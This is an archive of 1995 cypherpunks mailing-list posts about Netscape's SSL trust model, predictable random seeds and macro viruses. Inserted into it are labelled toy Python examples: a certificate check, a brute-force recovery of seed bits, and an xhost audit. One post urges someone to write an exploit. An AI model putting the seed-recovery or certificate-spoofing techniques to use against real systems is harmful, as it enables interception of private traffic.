>sufficient grovelling skills for your superiors or you will
>not only be fired from your JOB but be excommunicated from the
>entire INDUSTRY, perhaps even tarred, feathered, drawn, quartered, and
>hung from your neck in the nearest tree!!! your employer will throw
>you to the wolves, your customers will spit on your flayed carcass,
>your family will look upon your shrivelled remains with shame,  the
>vultures will vomit your indigestible eviscerated entrails,
>and the world immediately explode, if you have a 
>SINGLE BUFFER OVERFLOW *anywhere* in your code!!

(ahem) this is not appropriate in the context of Netscape's aims, unless they
want to become financial transaction experts more in line with banking
expertise. netscape is more a "bring cyberspace to the masses" company,
not "bring secure transactions to cyberspace". it's just because so
few companies are successfully doing the latter, that netscape is forced
to implement some "key" aspects of it to support the former. but I suspect
they may ease out of the cryptographic security business in the long run,
delegating it to other companies' plug-in-packages.

furthermore, cyberspace is growing gradually. the way we get to really
incredible secure transactions is through a growing process, an evolution
in which mistakes are made at different levels, and which in the beginning
the software is not much more than a toy that looks pretty and has the
fewest moving parts and most simplistic design imaginable. 

I fully believe that some day a company in cyberspace will exist
that satisfies PM's and all other cypherpunk's most erotic dreams 
about secure transactions. however that day is years away and it
will take a long time to reach it. and I doubt that it will be the
same company that is playing around with GUI's for the end user and
hiring college programming hot-shots and Java geeks.  IMHO netscape 
is probably not going to be the company that will try to bring the
*lowlevel infrastructure* for cash, judging by the current winds,
although that could change. they will definitely help guide its
progress and be interacting with the companies that do, however.

when the big Secure Transactions Inc.  company is invented for
cyberspace, *then* the kinds of absolutely uncompromising  standards that PM
embodies will be in place. but again, we cannot expect the companies
of today to embody that ideology and atmosphere for a few years yet.

the cypherpunks play a very valuable role in finding these "growing
pain" mistakes of beginning companies such as Netscape,
but we are not really serving our own best interests or the 
harmonious growth of cyberspace by vilifying/ embarrassing/ 
browbeating/ humiliating companies or their employees over their security
problems, at least if they are clearly responsive to far less ammunition.
keep in mind that NSA unbreakable security is *just*not*appropriate* in
every situation, and in fact "weak" encryption does have legitimate 
uses (i.e. in a world where people routinely lock their keys in their
cars). (although I agree, in general one should always try to design a 
system to be as secure as possible.)

(oops, I used the term "we" in that paragraph, a grave cypherpunk sin.. 
my humble apologies; @#$%^&* cryptoanarchist vocabulary)
 
that all said, nevertheless, I do enjoy PM's periodic displays of 
indigestible bile eruptions at least as much as one of the other 
infamous amusing crackpots circulating in this corner of cyberspace..
(but geez, PM, were you raised by a pack of wild wolves or what?)

p.s. to TCM: why do you continually find my login name abbreviation so 
fascinating??? my apologies to anyone if I am missing some kind of 
inside joke here, I'm a little dense at times <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 25 Sep 95 12:53:39 PDT
To: "David J. Bianco" <bianco@itribe.net>
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <199509251247.IAA27297@gatekeeper.itribe.net>
Message-ID: <Pine.SOL.3.91.950925124443.359B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


I can confirm that, at least up to 1.2, netscape navigator does not do any 
validation beyond checking the signer of the certificate. 

Exactly - the trust model used in Navigator 1.1N requires you to trust 
every single owner of a valid certificate. Getting hold of any key is 
vastly easier than having to obtain a specific key; in the worst case, 
you just buy your own - SSL exchanges are repudiable, and a few simple 
tricks can make sure your certificate doesn't show up in the "Document 
Information" dialog box. Or, since there are is CRLing, accidentally lose 
your private key, notify Verisign and get a revocation. 

To detect the attack without using either a modified client, or a nice
proxy that checks for you, you must do packet-tracing on all SSL
connections, regenerate the exchange, and then review each exchange to
look for suspicious certificates. 
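
[Added example, not part of the original message and not Netscape's code: a toy model of the check described above, comparing a client that accepts any certificate from a trusted signer with one that also requires the certificate's subject to match the requested host, plus the after-the-fact review of logged exchanges. The Cert type, the CA name, the host names and the use of an HMAC as a stand-in for the CA's signature are all assumptions made for illustration.]

```python
"""Toy model of signer-only versus signer-and-name certificate checks."""
import hashlib
import hmac
from dataclasses import dataclass

# Assumption: an HMAC under a demo key stands in for the CA's public-key
# signature so the example runs offline with the standard library only.
TRUSTED_CA = "Demo Root CA"            # hypothetical CA name
_CA_KEY = b"constructed-demo-key"      # constructed value, not a real key


@dataclass(frozen=True)
class Cert:
    subject: str      # host name the CA vouched for
    issuer: str       # who signed the certificate
    signature: bytes  # stand-in for the CA signature over subject and issuer


def _sign(subject: str, issuer: str, key: bytes) -> bytes:
    return hmac.new(key, f"{subject}\n{issuer}".encode(), hashlib.sha256).digest()


def ca_issue(subject: str) -> Cert:
    """The CA vouches that the key holder really is `subject`."""
    return Cert(subject, TRUSTED_CA, _sign(subject, TRUSTED_CA, _CA_KEY))


def signed_by_trusted_ca(cert: Cert) -> bool:
    if cert.issuer != TRUSTED_CA:
        return False
    expected = _sign(cert.subject, cert.issuer, _CA_KEY)
    return hmac.compare_digest(cert.signature, expected)


def accept_signer_only(requested_host: str, cert: Cert) -> bool:
    """The behaviour described in the thread: only the signer is checked,
    so the requested host plays no part in the decision."""
    return signed_by_trusted_ca(cert)


def accept_signer_and_name(requested_host: str, cert: Cert) -> bool:
    """Hardened check: trusted signer AND the subject is the host we asked for."""
    return (signed_by_trusted_ca(cert)
            and cert.subject.lower() == requested_host.lower())


def audit(connections):
    """Review logged (requested_host, cert) pairs and report suspicious ones."""
    findings = []
    for host, cert in connections:
        if not signed_by_trusted_ca(cert):
            findings.append((host, cert.subject, "untrusted signer"))
        elif cert.subject.lower() != host.lower():
            findings.append((host, cert.subject, "name mismatch"))
    return findings


# Constructed sample data: three exchanges that all requested shop.example.
SHOP = ca_issue("shop.example")                           # the genuine server
OTHER = ca_issue("other.example")                         # valid cert, wrong holder
FORGED = Cert("shop.example", TRUSTED_CA, b"\x00" * 32)   # bad signature
OBSERVED = [("shop.example", SHOP),
            ("shop.example", OTHER),
            ("shop.example", FORGED)]

if __name__ == "__main__":
    for host, cert in OBSERVED:
        print(host, cert.subject,
              "signer-only:", accept_signer_only(host, cert),
              "signer+name:", accept_signer_and_name(host, cert))
    for finding in audit(OBSERVED):
        print("suspicious:", finding)
```
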





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Mon, 25 Sep 95 12:58:06 PDT
To: vznuri@netcom.com
Subject: Re: netscape bug
Message-ID: <199509251957.MAA15095@quito.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509201855.LAA17261@netcom16.netcom.com> you write:
> 
> none of the articles mention that the cracker must have login access
> to the computer that the random numbers are generated on. is this true?
> does the code require knowledge of the PID etc. that can only be obtained
> by a login to the system that the netscape session is running on?
> 

No, the time, pid, and ppid often leak to a remote adversary too.
The attack probably requires a bit more sophistication when the
cracker doesn't have login access, but I believe it's still possible.

See my recent post to sci.crypt for some comments from Ian & I
about this.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Mon, 25 Sep 95 13:32:16 PDT
To: cwe@Csli.Stanford.EDU
Subject: Re: Exchange random numbers (was: Re: netscape's response)
Message-ID: <199509252031.NAA15134@quito.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509211852.LAA22259@Csli.Stanford.EDU> you write:
> 
> | If I only ever give out a hash of my seed, and only ever *add* any received
> | info to my seed (and stir it in well), how can anyone find out anything?
> | (Apart from hash weaknesses.)
> 
> Giving out contribution: 
>      MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote
> Taking in contribution : 
>      my_seed = my_seed XOR 
>      ((select_low_bits(remote_contrib, contrib_width) << contrib_area)
> 

People seem to think this kind of thing is obviously safe.  I'm not yet
convinced.

By xoring in a quantity *chosen by your adversary*, you're essentially
allowing related-key attacks on your stream cipher.  (Your PRNG is just
a stream cipher, keyed with my_seed.)

No one knows how secure most ciphers are against related-key attacks:
related-key attacks are known to be very powerful (often more powerful
than any other type); but very little research on this topic is available.
You're treading on unknown ground.



There's also a small error in your specific algorithm.  Let
	 n = stop_bit - start_bit;
presumably n is much less than the length of your seed.  Then a brute-force
search over n bits will recover n bits of the seed -- this is a much faster
cryptanalysis than a brute force over all bits of the seed.  This can
probably be fixed by something like
	MD5(select_bits(MD5(my_seed))) -> remote,
but the related-key uncertainties still remain.
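
[Added example, not part of the original message: the n-bit search described above, run against the quoted "giving out" step with a 16-bit window, next to the suggested MD5(select_bits(MD5(my_seed))) variant. The 128-bit seed width, the byte encoding of the window, the constructed seed value and all function names are assumptions; the thread specifies none of them.]

```python
"""Why MD5(select_bits(my_seed, start, stop)) leaks the selected seed bits."""
import hashlib

SEED_BYTES = 16  # assumption: a 128-bit seed; the thread gives no width


def select_bits(value: int, start_bit: int, stop_bit: int) -> int:
    """Return bits [start_bit, stop_bit) of value (bit 0 is the LSB)."""
    width = stop_bit - start_bit
    return (value >> start_bit) & ((1 << width) - 1)


def _md5_of_window(window: int, width: int) -> bytes:
    # Assumed encoding: the window as a big-endian byte string.
    return hashlib.md5(window.to_bytes((width + 7) // 8, "big")).digest()


def contribution_original(seed: int, start_bit: int, stop_bit: int) -> bytes:
    """The quoted scheme: hash a raw slice of the seed and hand it out."""
    width = stop_bit - start_bit
    return _md5_of_window(select_bits(seed, start_bit, stop_bit), width)


def hashed_seed(seed: int) -> int:
    """MD5 of the whole seed, as an integer."""
    digest = hashlib.md5(seed.to_bytes(SEED_BYTES, "big")).digest()
    return int.from_bytes(digest, "big")


def contribution_fixed(seed: int, start_bit: int, stop_bit: int) -> bytes:
    """The suggested variant: slice MD5(seed) instead of the seed itself."""
    width = stop_bit - start_bit
    return _md5_of_window(select_bits(hashed_seed(seed), start_bit, stop_bit), width)


def recover_window(contribution: bytes, width: int):
    """Exhaustive search over the 2**width possible windows.

    The cost depends only on the window width n, never on the seed length.
    """
    for guess in range(1 << width):
        if _md5_of_window(guess, width) == contribution:
            return guess
    return None


# Constructed sample seed: bytes 0x01..0x10, so bits 40..55 are 0x0A0B.
SEED = int.from_bytes(bytes(range(1, 17)), "big")
START, STOP = 40, 56

if __name__ == "__main__":
    n = STOP - START
    leaked = recover_window(contribution_original(SEED, START, STOP), n)
    print("original scheme: recovered seed bits", hex(leaked),
          "actual", hex(select_bits(SEED, START, STOP)))
    got = recover_window(contribution_fixed(SEED, START, STOP), n)
    print("hashed variant: recovered", hex(got),
          "which is a slice of MD5(seed), not of the seed")
```

[With the original step, 2**16 hash evaluations return 16 bits of the seed itself. With the hashed variant the same search returns only bits of MD5(seed); the related-key concern raised in the message is not addressed by either form.]
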



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 25 Sep 95 14:25:25 PDT
To: wb8foz@nrk.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <ac8ccae902021004990a@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:29 PM 9/24/95, Ed Carp [khijol SysAdmin] wrote:
....
>I learned the hard way - keep the transmitters away from a reverse-biased
>diode acting as a noise generator.  Only until I examined the output did
>I realize it wasn't random.  I fixed it, though, by looking at the output
>and testing its randomness.
....
Very interesting. I wouldn't be too sure that a transmitted signal at a
single frequency is the only signal that an opponent could use to bias your
random numbers. How do you "test for randomness"? I think that signal to
noise arguments, phrased in terms of entropy, can protect you against
unknown and unwanted signal. (Ironically you want a very low signal to
noise ratio!) Perhaps you merely take n/(S/N) bits from the HRNG when you
need n bits and run them thru MD5. Here S is the signal strength of the
maximum plausible unwanted signal, and N is the noise of the diode.

I encourage both diode theorists and information theorists to quibble with
the above formula!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian Gorka" <gorkab@sanchez.com>
Date: Mon, 25 Sep 95 10:52:40 PDT
To: cypherpunks@toad.com
Subject: List of US representitives
Message-ID: <00996ED487C83F20.00003C77@sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone posted a list of US reps awhile back...  Can someone forward me a copy? 

Thanks.
Brian Gorka






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 25 Sep 95 14:01:53 PDT
To: sameer@c2.org
Subject: Re: Netscape as vehicle for cypherpunk agenda/the cypherpunk bully pulpit
In-Reply-To: <199509251741.KAA04656@infinity.c2.org>
Message-ID: <199509252101.OAA09395@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I agree with Sameer's points here. Netscape carries with it the
potential of revitalizing the cypherpunks agenda, but also, in the
worst case, making it irrelevant. What happens, I think, depends on
what we do.

On the plus side, Netscape 2.0 will, without a doubt, be the first
usable mail tool to incorporate real encryption. It may accomplish,
almost overnight, the long-held goal of making a nontrivial fraction
of Internet email secure.

Another potentially big win is the Java language. It seems to me that
it will be quite plausible to code up real crypto applications in this
language. Once coded, these applications will run on every important
platform in the universe, and can be accessible by the click of a
mouse. Perl-RSA was a sign of what's possible in the non-C world. One
caveat is the slowdown from the interpreted code (roughly a factor of
25). The best way to look at this is as a challenge, to use clever
coding tricks and intelligent architectures, including caching. The
speed of Java implementations will inevitably improve - in fact, I
might just be doing my PhD thesis on memory management in Java.

One potential downside, as Sameer points out, is the X.509
certification hierarchy. This ancient beast has the potential to
defeat many of the cypherpunk aims, most especially the possibility of
anonymous communication. However, that's not a foregone conclusion.
The most important thing to be doing right now is to _understand_
what's happening. Over the next couple of weeks, I'll be reading the
S/MIME and X.509 documentation, poring over reference code, and (of
course) playing with Netscape 2.0 myself. We're much more likely to
get our agenda implemented if we are armed with a good understanding.
There are lots of ways around X.509 - maybe we can work our way around
it, maybe we can adapt it to our needs, maybe we can come up with
something better and get it replaced. Whatever the case may be, we
should not give up hope.

Netscape is one manifestation of the ancient Chinese curse: may we
live in interesting times!

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 24 Sep 95 21:06:43 PDT
To: vince@offshore.com.ai (Vincent Cate)
Subject: Re: real randomness for netscape - user clicking mouse
In-Reply-To: <Pine.3.89.9509211743.A459-0100000@offshore.com.ai>
Message-ID: <199509250402.OAA17312@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello Vincent Cate <vince@offshore.com.ai>
  and cypherpunks@toad.com
  and jsw@neon.netscape.com
 
Vincent Cate <vince@offshore.com.ai> wrote:
[about getting entropy from mouse]
> You must get the random bits from something that nobody else could watch. 
...
> other hand, an attacker would have to have broken the machine to get the
> mouse info
...

Not really... Have you ever been on an X system with host-based
security (as opposed to xauth)? Anyone who has user login rights
to the machine you're on (*) can just telnet in and open windows
on your screen, blink the leds on your keyboard, install
fonts, confine the mouse to a given screen area, etc.

I understand that normally they can get a copy of every
X event you get (and filter them), but I've never tried...

(*) More accurately, any of the machines you can run X programs from.

Mouse events might not be as secret as we would like...

Jiri
--
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)
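
A defender-side check for the exposure described in the message above, added here as an example and not part of the original post: it reads the access list printed by `xhost` and flags host-based grants, where any account on the listed machine can reach the display. The sample listing is constructed, and the function names `audit_xhost` and `host_based_grants` are hypothetical.

```python
# Constructed sample of `xhost` output; host and user names are made up.
SAMPLE_XHOST_OUTPUT = """\
access control enabled, only authorized clients can connect
INET:sweeney.example.edu
labhost7.example.edu
SI:localuser:jiri
LOCAL:
"""


def audit_xhost(output):
    """Return a list of (severity, message) findings for one `xhost` listing."""
    findings = []
    for raw in output.splitlines():
        line = raw.strip()
        if not line:
            continue
        # Status line: only the "disabled" state is a finding in itself.
        if line.startswith("access control"):
            if "disabled" in line:
                findings.append((
                    "critical",
                    "access control is disabled: clients on any host can connect",
                ))
            continue
        family, sep, name = line.partition(":")
        if sep and family == "SI":
            # Server-interpreted entries can name a single user, not a machine.
            findings.append(("info", "server-interpreted entry: " + name))
        elif sep and family == "LOCAL":
            findings.append((
                "warning",
                "every local (non-network) client is allowed, whoever runs it",
            ))
        else:
            # Either FAMILY:host (INET, INET6, ...) or a bare host name.
            host = name if sep else line
            findings.append((
                "warning",
                "host-based grant: any account on %s can open the display "
                "and watch its input events" % host,
            ))
    return findings


def host_based_grants(output):
    """Only the findings that expose the display beyond a single user."""
    return [msg for severity, msg in audit_xhost(output) if severity != "info"]


if __name__ == "__main__":
    for severity, message in audit_xhost(SAMPLE_XHOST_OUTPUT):
        print("%-8s %s" % (severity, message))
```

Entries flagged as warnings are the ones to replace with per-user authorization such as xauth, which is the alternative the message names.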



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Mon, 25 Sep 95 14:43:02 PDT
To: "David J. Bianco" <bianco@itribe.net>
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <4454nu$da8@tera.mcom.com>
Message-ID: <3067219B.167E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> Will you put a picture up on http://www.netscape.com/ if someone does find
> a problem?

If you look at my home page (see below), you can see a picture from about
25 years ago. If I have to shave my head, I will post before and after
pictures.

PK
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 25 Sep 95 12:02:32 PDT
To: dmandl@panix.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <Pine.SUN.3.91.950922154119.7388A-100000@panix.com>
Message-ID: <Pine.SUN.3.91.950925144312.26957E-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995 dmandl@panix.com wrote:

> On Fri, 22 Sep 1995, Adam Shostack wrote:
> 
> > Perry E. Metzger wrote:
> > 
> > | I don't believe the Sun Java stuff would suffer from it, although I
> > | fear Java a great deal.
> > 
> > 	I keep hearing this thought.  Isn't Win95 with its
> > 'executables in email' much more dangerous than Java, which at least
> > tries to address security?
> 
> Is that the new MS-Word you're thinking of?  I hear that it lets you
> imbed macros containing executable code in documents.  That's got to
> be one of the most dangerous ideas ever cooked up.

Agreed; but it's present, not just in Word (every version since 2.0, as 
far as I can tell, in fact, since they all let you make system calls...), 
but in Microsoft Network, Microsoft Access, Microsoft Excel... I believe 
PowerPoint and Publisher are exempt from this bug, if only because the 
current versions have no macro languages...

One of the penalties that modern software (at least for Windows) imposes 
is the ability to create massive viri, simply by allowing system calls to 
be executed from macros (if this was not the case, OLE technology 
wouldn't work, and interoperation between Windows programs can't occur, 
thereby crippling the system through bad design regardless of which 
alternative was chosen)

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Phillips <paulp@CERF.NET>
Date: Mon, 25 Sep 95 14:51:32 PDT
To: cypherpunks@toad.com
Subject: Re: Golden Coy Freeh
In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950925144659.21198A-100000@nic.cerf.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 25 Sep 1995, John Young wrote:

>    The New York Times, January 25, 1995, p. D5.
> 
>    The F.B.I. Sting Operation on Child Pornography Raises
>    Questions About Cryptography
> 
>    By Peter H. Lewis
>
>    [snip]
> 
>    If the head of the F.B.I. acknowledged that his agency was
>    powerless to crack a cryptography program like Pretty Good
>    Privacy, the stampede for that software on the Internet
>    would make the run on Windows 95 look puny.

That's a bizarre and naive statement.  Is there anyone that thinks the 
spread of strong crypto has been less than rapid only because people are 
afraid it won't protect them against the government? Um, sorry, no.

--
Paul Phillips                                 | "Click _here_ if you do not
<URL:mailto:paulp@cerf.net>                   |  have a graphical browser"
<URL:http://www.primus.com/staff/paulp/>      |  -- Canter and Siegel, on
<URL:pots://+1-619-558-3789/is/paul/there?>   |  their short-lived web site




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 25 Sep 95 11:57:48 PDT
To: Herb Sutter <herbs@interlog.com>
Subject: Re: Notes security question
In-Reply-To: <199509230133.VAA05532@gold.interlog.com>
Message-ID: <Pine.SUN.3.91.950925145104.26957F-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Herb Sutter wrote:

> While I'm at it, here's a question I've been wondering about recently: Why
> is it I've never heard of any security issues with Lotus Notes?  Are there
> no known weaknesses?  Or did existing weaknesses just not get much press
> because Notes isn't a commercially visible consumer product like Netscape?

Perhaps the Notes pricing scheme is sooo outrageous (by the standards of 
a student like myself, and probably most others, if it's still anything 
like it was at the 1.0 release) that most people have had zero opportunity 
to examine the program, let alone really have time to play with it?

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Mon, 25 Sep 95 12:03:16 PDT
To: cypherpunks@toad.com
Subject: Re: CyberAngels
In-Reply-To: <9qJZBD1w165w@left.webcasters.com>
Message-ID: <6RZZBD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


To: morning@npr.org
Cc: root
Subject: CyberAngels
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Reply-To: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Message-ID: <9qJZBD1w165w@left.webcasters.com>
Date: Mon, 25 Sep 95 09:09:55 EDT
Organization: WebCasters(tm)

Just what this world needs -- more vigilantes. To my mind, they are the
moral equivalent of the right wing militia groups.

A technical point: The piece would have the people who are not computer
literate believe that GIF and JPG are code words for porn pictures and are
used only in that context. The truth is they are merely computer filename
extensions used for two different graphical data formats. You will also find
GIF and JPG formatted images used on the White House WWW page, the Library of
Congress' THOMAS, and the WWW page for the Pope's visit to Baltimore - not to
mention the WWW page I just created for a customer selling polluted water
filtration systems.

I have never in my 62 years witnessed any news story on any subject about
which I had any personal knowledge or expertise that did not contain factual
errors. Is it any wonder that people are increasingly skeptical of the news
media?

--
                        WebCasters(tm)
James C. Grubs                         jgrubs@left.webcasters.com
6817 Maplewood Avenue                         Tel.: 419-882-2697
Sylvania, Oh 43560                             Fax: 419-885-2814
  Internet consulting, HTML programming, Information brokering
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Mon, 25 Sep 95 12:08:53 PDT
To: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Subject: Re: Persistent Services Needed
In-Reply-To: <v02110102ac8c96b652cf@[204.179.132.9]>
Message-ID: <199509251905.PAA28033@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 25, 10:36, "Erik E. Fair"  (Time Keeper) sent the following to the
NSA's mail archives:
> Subject: Re: Persistent Services Needed
|| One way to establish persistent services is to use the DNS for
|| indirection:
|| register a name for a service (or a set of services), which then point to
|| servers of those services by a DNS name. If the service needs to move
|| (hosts, net connections, etc), the only thing that changes is the
|| DNS zone file and the references to the service through the name stay
|| exactly the same. Hell, if your service requires no state information
|| or can have replicated data (e.g. DNS, FTP, WWW), you can use "round
|| robin" techniques with very low DNS RR TTL's to spread the service
|| load over a bunch of widely distributed hosts.
||

Sounds like a good idea to me. I've always kinda wondered why there wasn't
a cypherpunks.org or something.  It'd certainly make it easier for folks to
find us...


--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 25 Sep 95 09:56:45 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
In-Reply-To: <ac87162a440210044474@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.950925154514.28472A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   "free" access to source code and "free" source code w/ free binaries 
are too often confused. in and of itself, GNU or Stallman are not 
providing free software for whatever use.  GNU allows free distribution, 
but not free commercialization --a good idea except critical maintenance 
is at the time-available consideration of the author.

   Sun permits (well, relatively free) access to their source code 
for the Java Series and is actively promoting open porting. personally, I 
like Java/Hot Java.

   as to a GNU-like product, I concur with TCM -it needs to be done 
before the commercial interests, politicians, NSA, and assorted crooks 
control the means whereby we communicate, and the browser, IMHO, has 
improved our communication and access to information by many orders of 
magnitude. Now, if any of the non-Gates browsers could fully support 
multi-use/multi-view mail, news, and info browse at the same time....

   I have the code for Mosaic, Java, etc. --they are not trivial. and 
don't forget VGML.

=====================  ORIGINAL MESSAGE  =============================

On Thu, 21 Sep 1995, Timothy C. May wrote:

> 
> I'm pretty happy with Netscape 1.1N, but John Gilmore's point about NCSA
> Mosaic gives me a thought:
> 
>
   [snip]
> 
> Why not a Gnu-style Web browser? I don't know if the original Mosaic can be
> used and added to, but I can imagine something like this could be done.
> 
> Web browsers are becoming, for many of us, our de facto interfaces to the
> Net, not just the Web. A project to make a truly freely distributable Web
> browser and Web server (the other part of the puzzle) could be interesting.
> Strong crypto could be added by volunteers working in their specialties,
> and the "Web proxie" could be put in with robustness (D-H forward secrecy,
> for example).
>
   amen!
> 
> I'll stop now, as I've never been a Gnu customer (except for Emacs), and so
> I'm not really in a position to comment and speculate on Gnu.
> 
> For all I know, Stallman and others have already thought of this and are
> working on it.
> 
> --Tim May
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 25 Sep 95 16:06:25 PDT
To: tedwards@Glue.umd.edu (Thomas Grant Edwards)
Subject: Re: WSJ on Netscape Hole 3
In-Reply-To: <Pine.SUN.3.91.950925182134.14756E-100000@thrash.src.umd.edu>
Message-ID: <199509252300.QAA29812@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	He's -asking- for an exploit. Tshirts to Ray and the person who
does the exploit, if it gets written. Maybe I should just ring up 8lgm and
have them do one.


> 
> On Mon, 25 Sep 1995, John Young wrote:
> 
> >    The Wall Street Journal, September 25, 1995, p. B12.
> 
> >    Marc Andreessen, vice president of technology at Netscape,
> >    said the company will issue fixes for the recent glitches
> >    later this week. He added that it's unclear whether
> >    anything other than temporarily crashing a user's computer
> >    could result from the recent flaw. 
> 
> Oh Marc, you didn't really want to say that, did you?
> 
> -Thomas
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jkandt@mail.wsdot.wa.gov (Jeff Kandt)
Date: Mon, 25 Sep 95 16:19:35 PDT
To: sharborth@hai-net.com
Subject: Re: Net KiddiePorn Hype on TV
Message-ID: <v01510106ac8c839e406c@[164.110.102.112]>
MIME-Version: 1.0
Content-Type: text/plain


>     That's not all.  This morning I was listening to National Peoples
>     Radio when there was a story about the "Cyber Angels."  It appears
>     that the "Guardian Angels" from NYC are now out on the net trying to
>     catch people talking about child pornography.
>
>     This will be real interesting to watch.  I don't remember all of the
>     story, but the best part I heard was when some "Cyber Angel" was
>     talking about listening to a chat session and according to her, GIFs are
>     codewords for pornography.
>
>     wsh

I heard that piece too.  Sounded like a total PR move for Curtis
Slewah(sp?) and his Guardian Angels.  They certainly didn't sound like they
knew what they were doing, technically speaking.

Representatives from the EFF _AND_ the FBI talked about their "concerns"
over private attempts to patrol cyberspace.  The EFF representative pointed
out that when you "see" a 15 yo female being propositioned by a 45 yo male
you really have no idea if either party is what they purport to be.  The
FBI guy pointed out that there is no provision in the current law for
anyone other than law enforcement to possess child pornography and the mere
act of downloading such images, even if the intention is to turn them over
to the police, would put the "Angels" in violation of the law; also
concerned that they might get in the way of police undercover
investigations.  Slewah himself admitted that there is no way to guarantee
that his "Angels" don't tend towards pedophilia themselves and might not
have completely pure motives.

-Jeff

-------
Jeff Kandt           "They that give up essential liberty to obtain a little
jkandt@wsdot.wa.gov   temporary safety deserve neither liberty nor safety."
Ph:(360)664-3510 (W)       --Benjamin Franklin, 1759
PGP Fingerprint: F1 59 8F 88 85 4F 2F 65  C2 5F D3 B5 8C 71 E0 E3






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Mon, 25 Sep 95 16:20:41 PDT
To: cypherpunks@toad.com
Subject: Security Update news release
Message-ID: <9509251617.ZM167@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain

  Here is the press release we put out this morning regarding the fix
for RNG seed and stack overflow problems.

	--Jeff

BETA VERSIONS OF NETSCAPE SECURITY UPDATE TO BE AVAILABLE WEDNESDAY FOR
FREE DOWNLOADING

Company Puts New Code on Net for Examination;
Outside Security Experts Reviewing Software

MOUNTAIN VIEW, Calif. (September 25, 1995) -- Netscape Communications
Corporation (NASDAQ:  NSCP) today announced that it has completed beta
versions of the security update for its client and server software and will
post the new software for free downloading from the Internet on Wednesday,
September 27.  The beta versions of the software updates, being posted
